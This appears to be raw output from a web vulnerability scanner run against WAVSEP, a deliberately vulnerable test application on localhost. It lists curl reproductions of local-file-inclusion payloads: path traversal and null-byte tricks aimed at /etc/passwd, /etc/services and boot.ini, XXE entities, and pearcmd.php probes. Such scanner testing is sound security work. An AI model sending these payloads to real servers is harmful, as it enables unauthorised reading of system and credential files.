curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
